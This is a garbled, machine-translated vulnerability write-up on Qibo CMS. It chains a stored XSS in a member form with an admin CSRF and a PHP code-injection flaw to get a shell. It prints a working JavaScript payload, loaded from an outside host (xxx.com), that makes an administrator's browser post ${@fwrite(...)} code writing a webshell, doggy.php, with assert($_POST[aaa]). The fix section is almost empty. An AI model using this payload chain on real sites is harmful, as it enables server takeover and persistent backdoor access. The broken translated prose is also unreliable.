Qibo CMS storage type XSS getshell (Combined Use)

Qibo cms won qibo cms with the power of combining three 0day backend getshells with the front-end storage-type xss + background CSRF + with little threat and negligible impact, although it is not a serious vulnerability, the problems and breakthroughs encountered in the middle of the process are comforting. Please take a look at the official website. -- by pandas

Some time ago, when Xidu broke qibocms 0day, he saw the code of qibo cms and found several getshells in the background. There were a lot of getshells in the background, the vendor has no influence on the positive and negligible attitude. Basically, all forms submitted in the background have CSRF. If there is a front-end getshell, the power will increase a lot, so I went to the front-end black box to dig out an xss. in this way, you can use getshell. 1. storage Type XSS location: member center-> omnipotent form-> Publish information-> moderator application: The submission value of postdb [sortname] [] is not filtered, but the length is limited, but this length is enough to write <script src = "http://xxx.com/1.js">, after submission, the administrator needs to go to the background and Choose Shortcut> omnipotent form model management> moderator Application> Management> View Details. the slash is replaced, so the backslash <script src = "http: \ xxx.com \ 1.js"> is used. 1. js is the internal file that we need to load externally. Rong. here, you need to submit a form, which is located in the background system function-> plug-in management-> points Introduction Management (jfadmin_mod). Modify the points to introduce any of them, insert $ {@ phpinfo () ;}in the title or content ();}. This can cause code execution. Therefore, you can submit the code for writing a php file. 1. The js content is as follows:

thisTHost = top.location.hostname;thisTHost = "http://"+thisTHost+"/v7/admin/index.php?lfj=jfadmin&action=addjf";function PostSubmit(url) {     var postUrl = url;    var ExportForm = document.createElement("FORM");     document.body.appendChild(ExportForm);     ExportForm.method = "POST";     var newElement = document.createElement("input");     newElement.setAttribute("name", "title");     var newElement2 = document.createElement("input");     newElement2.setAttribute("name", "fid");     var newElement3 = document.createElement("input");     newElement3.setAttribute("name", "list");    var newElement4 = document.createElement("input");     newElement4.setAttribute("name", "content");     ExportForm.appendChild(newElement);     ExportForm.appendChild(newElement2);     ExportForm.appendChild(newElement3);    ExportForm.appendChild(newElement4);    newElement.value = "${@fwrite(fopen('doggy.php', 'w+'), '<?php assert($_POST[aaa]);?>')}";     newElement2.value = 1;    newElement3.value = 1;     newElement4.value = 1;     ExportForm.action = postUrl;     ExportForm.submit(); };PostSubmit(thisTHost);

 

There are two parts to prove: 1. User Part 1) login 2) Write xss 2. Administrator part view the application in the website/admin directory will add doggy. php content:
  Solution:

Repair with emphasis